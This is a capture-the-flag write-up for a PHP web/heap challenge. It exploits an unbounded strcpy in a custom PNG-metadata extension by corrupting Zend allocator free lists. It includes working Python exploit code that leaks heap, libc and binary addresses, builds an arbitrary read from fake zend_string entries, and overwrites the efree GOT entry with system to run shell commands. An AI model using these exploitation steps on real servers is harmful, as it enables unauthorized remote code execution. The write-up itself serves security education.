Under The Web
- Category: Web-Pwn
- Vuln type: Heap
- Description: Dive deep under the web’s surface, where "L" in LFI stands for "LEAK". Will you conquer the depths and claim victory?
This writeup covers my solution to the Under The Web challenge (Web-Pwn / Heap).
The intended exploitation path involved abusing a Local File Inclusion (LFI) bug in the PHP application to leak the process memory mappings (e.g., /proc/self/maps) and break ASLR before pivoting to the heap vulnerability.
However, I solved the challenge with an unintended approach: I completely ignored the LFI and instead performed a bit of heap feng shui inside Zend’s custom allocator (ZMM). By controlling how the metadata chunks were allocated and freed, I was able to reliably exploit the heap overflow directly and obtain RCE without needing external memory leaks.
The challenge
In this challenge we are presented with a PHP web application that relies on a custom PHP extension called metadata_reader.so.
The application allows us to upload and view any PNG image through the following endpoints:
- POST upload.php
- GET view.php?image=uploads/image.png
The vulnerable extension is responsible for parsing PNG metadata fields such as Title, Artist, and Copyright, and then displaying them back in the response together with the image.
Binary analysis
The function zif_getImgMetadata is the PHP extension entry point used to extract metadata from a PNG file and return it to PHP userland. It relies on libpng for parsing PNG structures, but allocates its own internal buffers via the Zend custom allocator (_emalloc, _efree). Below is a breakdown of its key components:
1. Argument Parsing
if (next == 1) {
    if (LOBYTE(execute_context[1].call) == 6) {
        // type check: string
        opline = execute_context[1].opline;
    } else {
        // fallback: zend_parse_arg_str_slow
    }
    file_name = (const char *)&opline->lineno;
}
- The function expects exactly one string argument: the PNG file path.
- No further validation is performed beyond type checking.
2. PNG Initialization
stream = fopen(file_name, "rb");
png_ptr = png_create_read_struct();
info_struct = png_create_info_struct(png_ptr);
png_read_info(png_ptr, info_struct);
- A file stream is opened.
- Standard libpng structures (png_ptr and info_struct) are initialized.
- png_read_info populates metadata structures from the PNG.
3. Metadata Extraction Loop
if (png_get_text(png_ptr, info_ptr, &metadata->text_ptr, &txt_entries_found) > 0) {
    while (...) {
        text_entry = &metadata->text_ptr[i];
        key = text_entry->key;
        ...
    }
}
- png_get_text retrieves embedded textual metadata entries.
- The extension loops over text chunks and looks for specific keys: "Title", "Artist", "Copyright".
4. Vulnerable Allocation & Copy
heap_pointer = (char *)_emalloc_56();
metadata->Artist = heap_pointer;
strcpy(heap_pointer, text_entry->text);
For each recognized key, the code:
- Allocates a fixed 56-byte buffer using _emalloc_56().
- Copies the user-controlled string from the PNG metadata into it with strcpy.
- Performs no bounds check: if the metadata string exceeds 55 bytes, it overflows into adjacent Zend heap chunks, corrupting memory.
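To make the size arithmetic concrete, here is a minimal Python sketch of what an unbounded strcpy does to two adjacent 56-byte slots. It is only a toy model: the helper names (c_strcpy, bytes_past_slot) are mine, and the real heap obviously is not a bytearray.

```python
SLOT_SIZE = 56  # size of each _emalloc_56() block


def c_strcpy(memory: bytearray, dest: int, src: bytes) -> int:
    """Mimic strcpy: copy src plus a NUL terminator, with no bounds check.

    Returns the number of bytes written.
    """
    data = src.split(b"\x00", 1)[0] + b"\x00"  # strcpy stops at the first NUL
    memory[dest:dest + len(data)] = data
    return len(data)


def bytes_past_slot(text: bytes) -> int:
    """How many bytes of `text` (terminator included) land in the next slot."""
    memory = bytearray(SLOT_SIZE * 2)  # two adjacent 56-byte slots
    written = c_strcpy(memory, 0, text)
    return max(0, written - SLOT_SIZE)


print(bytes_past_slot(b"A" * 55))  # 0: fits exactly, terminator included
print(bytes_past_slot(b"A" * 56))  # 1: only the terminator spills over
print(bytes_past_slot(b"A" * 64))  # 9: 8 bytes of text plus the terminator
```

The 56-character case (a single NUL byte spilling over) and the 64-character case (the first 8 bytes of the neighbour overwritten) are the two that matter for the rest of the exploit.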
5. Output Formatting
Each of these pointers is saved in a custom struct named MetaData:
struct MetaData {           // total size = 0x38
    char *Artist;           // allocated via _emalloc(56)
    char *Title;            // allocated via _emalloc(56)
    char *Copyright;        // allocated via _emalloc(56)
    char *PngName;          // file path string
    png_structp png_ptr;    // libpng internal struct
    png_infop info_ptr;     // libpng info struct
    png_textp text_ptr;     // array of text chunks from the PNG
};
- After extraction, the function formats the values into a fixed 256-byte stack buffer.
- Each allocated metadata buffer is freed right after being printed (_efree).
ap_php_snprintf(v21, v20, "Title: %s\n", Title);
_efree(metadata->Title);
ap_php_snprintf(v25, v24, "Artist: %s\n", Artist);
_efree(metadata->Artist);
ap_php_snprintf(v29, v28, "Copyright: %s\n", Copyright);
_efree(metadata->Copyright);
Key Problems
There are several problems with this implementation:
- If at least one of the expected metadata keys is missing from the PNG, the corresponding field in the custom MetaData struct is never initialized. This leaves the pointer containing whatever stale value happens to be in that slot of the Zend heap. When the code later attempts to use or free this uninitialized pointer, it leads to undefined behavior, which explains why the server crashes when uploading a normal PNG without metadata.
- Since the code does not enforce uniqueness of metadata keys, the same tag (e.g., Artist, Title, or Copyright) can appear multiple times in the PNG. Each occurrence triggers a new allocation, meaning an attacker can force the program to allocate an arbitrary number of heap chunks.
- The code allocates a fixed-size buffer (56 bytes) for each metadata entry. It then performs an unbounded strcpy from user-controlled PNG text fields. This leads to heap buffer overflows inside Zend’s custom memory allocator.
Understanding Zend Memory Allocation
To reliably exploit the metadata vulnerability, it’s essential to understand how Zend’s custom memory allocator organizes and manages heap memory.
Zend uses a custom memory allocator that manages memory differently from standard malloc. Memory is divided into large contiguous “chunks” of 2 MB. Each chunk is further subdivided into pages, and each page is assigned to a bucket.
Buckets in Zend are analogous to free bins in libc: each bucket holds a series of contiguous fixed-size blocks. There are 30 buckets in total, with block sizes ranging from 8 bytes up to 3072 bytes. When a request for memory is made, the allocator selects the smallest suitable bucket and returns a block from that bucket. If the bucket is empty, a new page is allocated from a chunk, assigned to a single bucket, and divided into blocks of the same size.
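As a rough illustration of "selects the smallest suitable bucket", the sketch below picks a bin for a requested size. The size table is my transcription of the 30 small-bin sizes from PHP's zend_alloc_sizes.h, so treat it as an assumption and check it against your PHP version; pick_bin is a hypothetical helper, not a Zend function.

```python
# Small-bin sizes as I understand them from zend_alloc_sizes.h (30 bins, 8 to 3072 bytes).
BIN_SIZES = [
    8, 16, 24, 32, 40, 48, 56, 64,
    80, 96, 112, 128,
    160, 192, 224, 256,
    320, 384, 448, 512,
    640, 768, 896, 1024,
    1280, 1536, 1792, 2048,
    2560, 3072,
]


def pick_bin(request_size: int) -> int:
    """Return the smallest bin size that can hold request_size bytes."""
    for size in BIN_SIZES:
        if request_size <= size:
            return size
    raise ValueError("too large for a small bin; served by a different path")


print(pick_bin(56))  # 56: the metadata buffers share one bin
print(pick_bin(57))  # 64: one byte more would land in a different bin
```

This is why the three metadata buffers, the MetaData struct (0x38 = 56 bytes) and any other 56-byte allocation all compete for blocks from the same pages.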
Runtime memory state
We can verify Zend’s allocation strategy by inspecting the Zend heap after processing a PNG image with deliberately crafted metadata. To do this, I upload a normal image whose metadata has been altered with Python's Pillow library:
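import io

import requests
from PIL import Image, PngImagePlugin

def upload_image(metadata):
    # Build a PNG whose text chunks carry the given key/value pairs, then upload it.
    with Image.open("original.png") as img:
        meta = PngImagePlugin.PngInfo()
        for key in metadata.keys():
            # strip() maps keys that differ only in surrounding whitespace to the same tag
            meta.add_text(key.strip(), metadata[key])
        buf = io.BytesIO()
        img.save(buf, format="PNG", pnginfo=meta)
    buf.seek(0)
    files = {"file": ("image.png", buf, "image/png")}
    resp = requests.post("http://localhost:8000/upload.php", files=files)
    return resp.content

data = upload_image({"Title": "A" * 55, "Artist": "B" * 55, "Copyright": "C" * 55})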
From the following dump we can clearly identify the MetaData structure, which contains 7 pointers.
The first three pointers refer to the heap blocks where the PNG strings (Title, Artist, Copyright) were copied.
As expected, all of these chunks were allocated in the same memory page and very close to each other. This happens because they were requested from the same bucket, given that they all have the same size (56 bytes). In fact, all blocks within a given page must have that exact size, since Zend assigns each page to a single bucket.
In the next image, we can even observe the free blocks available for allocation. Each free block stores, in its first 8 bytes, a pointer to the next free block of the same size — forming a free list.
Because of this design, each element in the chain does not need a size header, only the forward pointer (fd), since all blocks are guaranteed to be of the same size.
However, this configuration is also dangerous from a security perspective, as very few consistency checks can be performed. We can confirm this by looking at the implementation of zend_mm_alloc_small, the function responsible for serving allocations from small bins.
The code shows that if a free block is available in the requested bin, the allocator simply takes the pointer from heap->free_slot[bin_num], updates the list head with the next_free_slot, and then directly returns that pointer to the caller. There are no checks to validate whether the pointer is legitimate, whether it actually belongs to the current heap, or even whether it points to properly allocated memory.
static zend_always_inline void *zend_mm_alloc_small(zend_mm_heap *heap, int bin_num ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
    ZEND_ASSERT(bin_data_size[bin_num] >= ZEND_MM_MIN_USEABLE_BIN_SIZE);
#if ZEND_MM_STAT
    do {
        size_t size = heap->size + bin_data_size[bin_num];
        size_t peak = MAX(heap->peak, size);
        heap->size = size;
        heap->peak = peak;
    } while (0);
#endif
    if (EXPECTED(heap->free_slot[bin_num] != NULL)) {
        zend_mm_free_slot *p = heap->free_slot[bin_num];
        heap->free_slot[bin_num] = zend_mm_get_next_free_slot(heap, bin_num, p);
        return p;
    } else {
        return zend_mm_alloc_small_slow(heap, bin_num ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
    }
}
This means that if we are able to overwrite the fd (forward pointer) of a free block with an arbitrary address, then once the corrupted block itself has been handed out, the allocator will happily return that address on the following call to zend_mm_alloc_small, giving us arbitrary address allocation.
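The effect is easy to reproduce in a toy model. The sketch below is not Zend code: ToyBin is a hypothetical class that keeps only the two things that matter here, a list head and next pointers stored inside the free blocks, and it trusts those pointers the same way the fast path described above does.

```python
import struct


class ToyBin:
    """Toy model of one small bin: a singly linked free list whose
    next pointers are stored inside the free blocks themselves."""

    def __init__(self, base: int, block_size: int, count: int):
        self.memory = {}  # block address -> 8-byte little-endian next pointer
        addrs = [base + i * block_size for i in range(count)]
        for cur, nxt in zip(addrs, addrs[1:] + [0]):
            self.memory[cur] = struct.pack("<Q", nxt)
        self.free_slot = base  # head of the free list

    def alloc(self) -> int:
        """Pop the head and trust whatever next pointer it contains."""
        p = self.free_slot
        raw = self.memory.get(p, b"\x00" * 8)
        self.free_slot = struct.unpack("<Q", raw)[0]
        return p

    def overwrite_next(self, block: int, target: int) -> None:
        """Stand-in for the heap overflow: clobber a free block's next pointer."""
        self.memory[block] = struct.pack("<Q", target)


heap = ToyBin(base=0x1000, block_size=56, count=4)
first = heap.alloc()                          # 0x1000, the buffer we overflow from
heap.overwrite_next(first + 56, 0xDEAD0000)   # corrupt the adjacent free block
second = heap.alloc()                         # 0x1038, still a legitimate block
third = heap.alloc()                          # 0xdead0000, attacker-chosen
print(hex(first), hex(second), hex(third))
```

Note the pattern: the first allocation performs the overflow, the second consumes the corrupted block, and the third is the one that lands on the chosen address. The exploit steps below all follow this three-allocation shape.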
Exploit
Step 1: Leaking Zend Heap Pointer
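We leak a pointer from the Zend heap by exploiting the order in which the buffers are printed and freed (Title → Artist → Copyright).
The PNG stores the Copyright entry before the Artist entry, so the Copyright buffer is allocated first and the Artist buffer lands right after it. A 56-character Copyright string makes strcpy write its terminating \x00 one byte past the buffer, into the first byte of the following block. When Artist is then allocated there, its content overwrites that byte, leaving Copyright without a terminator.
Since Artist is freed before Copyright is printed, the first 8 bytes of the Artist block already hold its forward pointer (fd) by then. Printing the unterminated Copyright string therefore runs into that pointer and reveals a raw Zend heap address.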
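import re

data = upload_image({
    "Title": "A" * 55,
    "Copyright": "C" * 56,  # overflow the \x00 into Artist
    "Artist": "B" * 55,
})
# The bytes between the run of C's and the closing tag are the leaked fd.
chunk_addr = int.from_bytes(
    re.findall(br"C{10,}(.*?)(?=</p>)", data)[0], "little"
)
heap_addr = chunk_addr - 0x5b230  # constant offset between the leaked pointer and the heap base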
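The leak can be replayed offline in a few lines. This is a simplified model with two adjacent 56-byte slots in a bytearray; the fd value is made up (the heap base seen later in the leakfind output plus the 0x5b230 offset), and the helper names are mine.

```python
SLOT = 56


def strcpy(mem: bytearray, dest: int, src: bytes) -> None:
    """Unbounded C-style copy: src plus a trailing NUL."""
    data = src + b"\x00"
    mem[dest:dest + len(data)] = data


def c_string(mem: bytearray, start: int) -> bytes:
    """Read bytes up to (not including) the first NUL, like a %s format would."""
    return bytes(mem[start:mem.index(b"\x00", start)])


mem = bytearray(SLOT * 3)                 # toy page with adjacent 56-byte slots
copyright_slot, artist_slot = 0, SLOT

strcpy(mem, copyright_slot, b"C" * 56)    # terminator lands in the Artist slot
strcpy(mem, artist_slot, b"B" * 55)       # Artist text replaces that terminator

# Freeing Artist stores the free-list pointer in its first 8 bytes.
fake_fd = 0x7F0E50E5B230                  # made-up heap address for the demo
mem[artist_slot:artist_slot + 8] = fake_fd.to_bytes(8, "little")

printed = c_string(mem, copyright_slot)   # what printing Copyright would emit
leak = int.from_bytes(printed[56:], "little")
print(hex(leak))                          # 0x7f0e50e5b230
```

Only six bytes follow the C's because the two most significant bytes of a userland pointer are zero, which is also what stops the print.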
Step 2: Leaking PHP Binary and Libc Heap Addresses
With the Zend heap base known, we can now manipulate chunk allocations. By overflowing the first allocated chunk into the second chunk (yet to be allocated), we can overwrite its FD pointer, which controls where the third chunk will be placed.
Using tools like leakfind, we can locate useful addresses present inside the Zend heap.
pwndbg> leakfind 0x7f0e50e00000 --p heap -o 0x200000 -d1
0x7f0e50e00000+0x1028 —▸ 0x55cf70f880a0 [heap]
0x7f0e50e00000+0x31c0 —▸ 0x55cf70f88290 [heap]
0x7f0e50e00000+0x5208 —▸ 0x55cf71011f40 [heap]
0x7f0e50e00000+0x5210 —▸ 0x55cf71011e40 [heap]
0x7f0e50e00000+0x5218 —▸ 0x55cf71011a40 [heap]
0x7f0e50e00000+0x5220 —▸ 0x55cf7100ca60 [heap]
0x7f0e50e00000+0x15358 —▸ 0x55cf71043c00 [heap]
...
Instead of allocating directly over our target memory (which would destroy it), we place the chunk over the MetaData struct. This allows us to overwrite the first pointer in the struct (char *Artist;), so that the later snprintf of Artist reads from an address of our choosing.
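from pwn import p64  # pwntools helper: pack a 64-bit little-endian integer
metadata_struct = heap_addr + 0x59150
php_leak = heap_addr + 0x590d8
data = upload_image({
    "Title": b"A" * 56 + p64(metadata_struct),  # overwrite the next free block's fd
    "Artist": "B" * 55,                         # consumes the corrupted block
    "Copyright": p64(php_leak)[:-1],            # lands on MetaData, replaces the Artist pointer
})
php_bin_leak = int.from_bytes(re.findall(br"Artist: (.*?)(?=</p>)", data)[0], "little")
php_addr = php_bin_leak - 0x55d380
print("php bin location: ", hex(php_addr))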
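For readers without pwntools, the overflow payload used above is just 56 filler bytes followed by an 8-byte little-endian pointer. A minimal standard-library sketch, where p64 is re-implemented with struct, overflow_payload is a hypothetical helper, and the address is only an example (heap base from the leakfind output plus 0x59150):

```python
import struct


def p64(value: int) -> bytes:
    """Pack an integer as 8 little-endian bytes (pwntools' p64 default)."""
    return struct.pack("<Q", value)


def overflow_payload(target: int, slot_size: int = 56, filler: bytes = b"A") -> bytes:
    """Fill one slot completely, then place `target` over the next block's fd."""
    return filler * slot_size + p64(target)


payload = overflow_payload(0x7F0E50E59150)  # example address, not from a real run
print(len(payload))      # 64
print(payload[56:])      # b'P\x91\xe5P\x0e\x7f\x00\x00'
```

Since strcpy stops at the first NUL, only the six low bytes and the terminator actually get copied; that is enough as long as the upper bytes of the value being replaced were already zero, which I assume is the case for userland pointers here.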
In the same way we can leak the address of the libc_heap and the stack.
Step 3: Leaking Libc Address
At this point, we know the Zend heap base and can leak the addresses of the PHP binary, the libc heap, and the stack. However, unlike the previous leaks, there are no libc pointers inside the Zend heap. This poses a challenge: we cannot simply reuse the trick of overwriting a MetaData pointer and reading through it via snprintf when the target lies outside the Zend heap.
The problem arises because immediately after printing a pointer with snprintf, the program calls _efree on that pointer. In Zend’s custom allocator, _efree performs a minimal heap integrity check to ensure the pointer being freed belongs to a valid chunk before adding it to the free list:
#define _ZEND_BIN_FREE(_num, _size, _elements, _pages, _min_size, y) \
    ZEND_API void ZEND_FASTCALL _efree_ ## _size(void *ptr) { \
        ZEND_MM_CUSTOM_DEALLOCATOR(ptr); \
        if (_size < _min_size) { \
            _efree_ ## _min_size(ptr); \
            return; \
        } \
        { \
            zend_mm_chunk *chunk = (zend_mm_chunk*)ZEND_MM_ALIGNED_BASE(ptr, ZEND_MM_CHUNK_SIZE); \
            ZEND_MM_CHECK(chunk->heap == AG(mm_heap), "zend_mm_heap corrupted"); \
            zend_mm_free_small(AG(mm_heap), ptr, _num); \
        } \
    }
Here, _efree:
- Aligns the pointer to its containing 2 MB chunk.
- Checks that chunk->heap matches the current Zend heap (AG(mm_heap)).
- If the check fails, it triggers a heap corruption error.
This means we cannot directly print a pointer to arbitrary memory outside the Zend heap, because _efree will detect that the chunk is invalid and crash the application.
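The alignment step is plain bit masking, so it is easy to check offline which pointers would survive the free. In this sketch chunk_base mirrors ZEND_MM_ALIGNED_BASE, while efree_would_accept is a simplification of mine: the real check reads chunk->heap from the aligned address and compares it with AG(mm_heap), whereas here I just test membership in a set of known chunk bases. The addresses are taken from the dumps in this writeup.

```python
ZEND_MM_CHUNK_SIZE = 2 * 1024 * 1024  # 2 MB chunks


def chunk_base(ptr: int) -> int:
    """Same arithmetic as ZEND_MM_ALIGNED_BASE(ptr, ZEND_MM_CHUNK_SIZE)."""
    return ptr & ~(ZEND_MM_CHUNK_SIZE - 1)


def efree_would_accept(ptr: int, zend_chunks: set) -> bool:
    """Simplified stand-in for the chunk->heap == AG(mm_heap) check."""
    return chunk_base(ptr) in zend_chunks


zend_chunks = {0x7F0E50E00000}

print(hex(chunk_base(0x7F0E50E5B188)))                  # 0x7f0e50e00000
print(efree_would_accept(0x7F0E50E5B188, zend_chunks))  # True: inside the Zend heap
print(efree_would_accept(0x55CF70F880A0, zend_chunks))  # False: libc heap pointer
```

The same mask also explains why a single leaked Zend heap pointer is enough to recover the heap base.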
To solve this, I looked for another strategy: instead of forcing Zend to print raw pointers outside the heap, I decided to stay entirely inside the Zend heap and leverage existing Zend data structures to leak arbitrary bytes.
When looking at the response formatting in the PHP file index.php:
<p><?= $data[0] ?></p>
<p><?= $data[1] ?></p>
<p><?= $data[2] ?></p>
we notice that our input is concatenated with constant HTML strings such as:
"</p>\n <p>"
If these constants are present in memory, they must be allocated as zend_string objects, and sure enough, I found one in the Zend heap:
pwndbg> find 0x7f0e50e00000, +0x200000 , "</p>\n <p>"
0x7f0e50e04138
Dumping it shows the full _zend_string metadata:
$4 = {
gc = { refcount = 1, u = { type_info = 86 } },
h = 9965324664382197394,
len = 16,
val = "</p>\n <p>"
}
So the constant HTML fragment lives in the heap as a _zend_string with a proper GC header.
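The next step was to locate who references this string. The find hit at 0x7f0e50e04138 is the val field, which sits 0x18 bytes into the structure (after gc, h, and len), so the zend_string itself starts at 0x7f0e50e04120. By scanning for pointers to 0x7f0e50e04120, I found several hits, and inside one array-like structure there were multiple entries: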
00007f0e50e8dbd0 00007f0e50e5b188 0000000000000006
00007f0e50e8dbe0 0000000000000000 0000000000000004
00007f0e50e8dbf0 00007f0e50e04120 0000000000000006
00007f0e50e8dc00 0000000000000001 0000000000000004
00007f0e50e8dc10 00007f0e50e04120 0000000000000006
00007f0e50e8dc20 0000000000000002 0000000000000004
00007f0e50e8dc30 00007f0e50e66640 0000000000000006
00007f0e50e8dc40 0000000000000001 0000000000000004
This looks exactly like a series of Bucket entries from a zend_array: each entry holds a value (here, a pointer to a zend_string) next to an integer indicating its type (6 is String in Zend). These entries live inside the Zend heap, so the allocation primitive can reach them. By overwriting those string pointers, I could make the entries point to an address of my choosing, and PHP would happily print the contents, because from Zend’s point of view, it’s just another zend_string.
This gave me a controlled arbitrary read primitive, even outside the Zend heap.
Constraints
- If we point outside the Zend heap, we must make sure that the garbage collector never invokes _efree on the string (otherwise the process will abort). To ensure this, the gc.refcount field of our fake _zend_string must be well above 0 so the GC doesn’t reclaim the string.
- The len field must be large enough to cover the bytes we want to leak.
As long as we align our fake zend_string correctly (refcount high, len big enough), we can leak anything in memory.
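To judge whether a candidate address would work as a fake zend_string, it helps to decode the bytes there the way PHP would. The sketch below assumes the usual 64-bit layout (refcount and type_info as 32-bit fields, then h and len as 64-bit fields, then val at offset 0x18); parse_zend_string, looks_usable, and the refcount threshold of 2 are my own choices for illustration.

```python
import struct

# Assumed 64-bit layout: refcount (u32), type_info (u32), h (u64), len (u64), then val.
ZSTR_HEADER = struct.Struct("<IIQQ")


def parse_zend_string(blob: bytes) -> dict:
    """Interpret raw bytes as a zend_string header followed by its value."""
    refcount, type_info, h, length = ZSTR_HEADER.unpack_from(blob, 0)
    val = blob[ZSTR_HEADER.size:ZSTR_HEADER.size + length]
    return {"refcount": refcount, "type_info": type_info, "h": h, "len": length, "val": val}


def looks_usable(zs: dict, wanted: int, min_refcount: int = 2) -> bool:
    """Both constraints at once: refcount comfortably above 0, len covering the target."""
    return zs["refcount"] >= min_refcount and zs["len"] >= wanted


# A legitimate-looking string, using the header values from the dump above
# (the value itself is shortened for the demo).
real = parse_zend_string(ZSTR_HEADER.pack(1, 86, 9965324664382197394, 5) + b"hello")
# Arbitrary memory that happens to decode to a large refcount and length.
fake = parse_zend_string(ZSTR_HEADER.pack(0x1000, 0, 0, 0x100) + b"\x41" * 0x100)

print(ZSTR_HEADER.size)           # 24, i.e. val starts at offset 0x18
print(looks_usable(real, 8))      # False: refcount 1 and only 5 bytes
print(looks_usable(fake, 0x80))   # True
```

In practice this means scanning the region you can already read for any 24-byte window whose first dword is large and whose third qword is a plausible length.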
I found a suitable location in the libc heap with a len large enough to leak a big chunk of memory. This gave me both the libc base and the base address of metadata_reader.so.
# libc_heap was leaked the same way as php_addr in Step 2
fake_zend_string = libc_heap + 0x290
entry_location = heap_addr + 0x8dbe0
data = upload_image({
    "Title ": b"A" * 56 + p64(entry_location + 0x10),
    "Artist ": b"B" * 55,
    "Copyright ": p64(fake_zend_string - 0x18)[:-1],
    # Two trailing spaces keep this a distinct dict key; upload_image strips them,
    # so the PNG ends up with a second "Copyright" entry.
    "Copyright  ": b"ciao",
})
libc_addr = int.from_bytes(data[1705:1713], "little") - 0x19f000
print("libc address:", hex(libc_addr))
metadata_bin = int.from_bytes(data[0xf6b39:0xf6b41], "little") - 0x3f30
print("metadata binary:", hex(metadata_bin))
Step 4: GOT Overwrite
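With both bases leaked, I overwrote the efree entry in the GOT of metadata_reader.so with system. Since Title is the first buffer passed to _efree after printing, that call now runs system on the Title string.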
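system_addr = libc_addr + 0x4c3a0
efree_got = metadata_bin + 0x4090
data = upload_image({
    "Artist": b"/" * 56 + p64(efree_got),        # next free block's fd -> GOT entry
    "Title": b'/bin/bash -c "ls >> view.php"',   # string that ends up passed to system
    "Copyright": p64(system_addr)[:-1],          # allocated over the GOT entry
})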
The command appended the names of the files in the folder to view.php, leaking the random flag file name. I then fetched it via LFI:
curl http://localhost:8000/view.php?image=9013e48b28a026976be69e7eba8f240e2c4c6d3fd0ed682abce6725ef2e788bd